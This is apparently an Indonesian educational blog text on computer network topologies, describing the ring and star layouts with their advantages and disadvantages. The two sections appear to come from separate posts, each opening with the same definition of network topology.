Topologi jaringan adalah suatu aturan atau cara untuk menghubungkan komputer yang satu dengan komputer yang lainnya sehingga membentuk suatu jaringan. Topologi jaringan juga dapat didefinisikan sebagai gambaran secara fisik dari pola hubungan antara komponen jaringan, yang meliputi Server, Workstation, Hub, dan pengkabelannya.

3. Topologi Ring



Topologi Ring


Untuk membentuk jaringan cincin, setiap sentral harus dihubungkan seri satu dengan yang lain dan hubungan ini akan membentuk Loop tertutup. Dalam sistem ini setiap sentral harus dirancang agar dapat berinteraksi dengan sentral yang berdekatan maupun berjauhan. Dengan demikian topologi ini memiliki kemampuan melakukan Switching ke berbagai arah Workstation. Keuntungan dari topologi jaringan ini antara lain adalah tingkat kerumitan jaringan rendah (sederhana). Topologi ini sering digunakan untuk jaringan yang luas pada satu kota dengan menggunakan media transmisi kabel fiber optik, misalnya untuk menghubungkan beberapa ISP pusat dan cabang dalam satu kota.

Keunggulan topologi Ring:

  1. Hemat kabel.
  2. Untuk membangun jaringan dengan topologi ini lebih murah bila dibandingkan dengan topologi Star.

Kelemahan topologi Ring:
  1. Sangat peka terhadap kesalahan jaringan.
  2. Sukar untuk mengembangkan jaringan, sehingga jaringan tersebut nampak menjadi kaku.
  3. Biaya pemasangan lebih besar.

Pengertian Topologi Star Serta Kelebihan dan Kekuranganya

Topologi jaringan adalah suatu aturan atau cara untuk menghubungkan komputer yang satu dengan komputer yang lainnya sehingga membentuk suatu jaringan. Topologi jaringan juga dapat didefinisikan sebagai gambaran secara fisik dari pola hubungan antara komponen jaringan, yang meliputi Server, Workstation, Hub, dan pengkabelannya.

2. Topologi Star



topologi star


Pada Topologi jaringan Star, setiap Workstation dihubungkan dengan menggunakan alat penghubung terpusat atau yang disebut dengan konsentrator. Masing – masing Workstation tidak saling berhubungan. Jadi setiap Workstation yang terhubung ke konsentrator tidak akan dapat berinteraksi atau berkomunikasi sebelum konsentrator dihidupkan. Bila Konsentrator dimatikan, maka seluruh koneksi jaringan akan terputus. Bila dibandingkan dengan sistem topologi jaringan Bus, sistem ini mempunyai tingkat kerumitan jaringan yang lebih sederhana, hanya saja pada sistem ini membutuhkan konsentrator.

Pada topologi ini beban yang dipikul oleh konsentrator cukup berat, dengan demikian tingkat kerusakan atau gangguan dari sentral ini lebih besar. Hubungan antar Workstation akan dilakukan melalui peralatan yang disebut konsentrator, sehingga setiap Workstation dihubungkan dengan kabel jaringan ke konsentrator. Jadi, tidak ada hubungan kabel antar Workstation. Pada topologi Star, penambahan Workstation tidak akan mengganggu sistem yang sedang bekerja, tinggal menambah kabel dari Workstation ke konsentrator. Begitu pula jika salah satu Workstation kabelnya terputus atau terjadi kerusakan, maka tidak akan mengganggu Workstation lain yang sedang bekerja. Yang bertindak sebagai konsentrator dalah Hub dan Switch.

Keunggulan topologi Star:

  1. Fleksibel dalam hal pemasangan jaringan baru, tanpa mempengaruhi jaringan yang sudah ada sebelumnya.
  2. Bila salah satu kabel koneksi User putus, maka hanya komputer  User yang bersangkutan saja yang tidak berfungsi dan tidak mempengaruhi User yang lain (keseluruhan hubungan jaringan masih tetap bekerja).

Kelemahan topologi Star:
  1. Boros dalam pemakaian kabel, jika dihubungkan dengan jaringan yang lebih besar dan luas.
  2. Bila pengiriman data secara bersamaan waktunya, dapat terjadi Collision.